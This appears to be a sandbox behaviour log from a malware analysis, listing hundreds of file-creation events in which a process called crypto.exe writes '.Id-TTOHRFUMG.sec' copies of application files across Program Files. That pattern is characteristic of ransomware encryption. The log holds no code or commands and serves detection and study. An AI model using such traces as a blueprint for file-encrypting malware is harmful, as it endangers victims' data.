File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00437_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02298_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\WMPDMCCore.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Dawson.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EquityMergeFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02253_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SAVE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNoteUI.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14829_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSN.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\audiodepthconverter.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21294_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libvorbis_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\License.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Managua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\kn.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\INLAUNCH.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR41F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RSSITEML.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libmad_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Recife.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00098_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TAIL.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299171.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libprefetch_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\gstreamer-lite.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseout.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18241_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105380.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00483_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01253_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14529_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Concourse.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR21F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL077.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\nn.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01196_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107280.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00820_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Discussion.gta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\attention.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Chita.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293844.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21299_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BDRTKFUL.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\libmosaic_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmpenc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCICONS.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01751_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14579_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL010.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmplayer.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241077.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\APPTS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSWORD.OLB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOUTL.OLB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FALL_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00530_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21435_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\dcpr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02115_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212701.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0300840.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07761_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR47B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\nacl_irt_x86_64.nexe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01361_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR6F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libwebvtt_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MsMpRes.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Graph.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7-zip.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_i420_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00233_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\hprof.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_pt-BR.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00601_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\picturePuzzle.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Kiev.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CNFNOT32.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf	crypto.exe
File created	C:\Program Files\Java\jre7\bin\kcms.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGHEADING.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-next-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14756_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSOUC_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\EnableEnter.php.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-CN.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\libxml2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Mazatlan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01366_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14528_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\UrbanLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB	crypto.exe
File created	C:\Program Files\7-Zip\Lang\eu.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Address.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02022_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\CURRENCY.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Memo.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\heart_glass_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN086.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jli.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN026.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GROOVEMN.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\XML Files\grvschema.xsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\localizedStrings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.Id-TTOHRFUMG.sec	crypto.exe
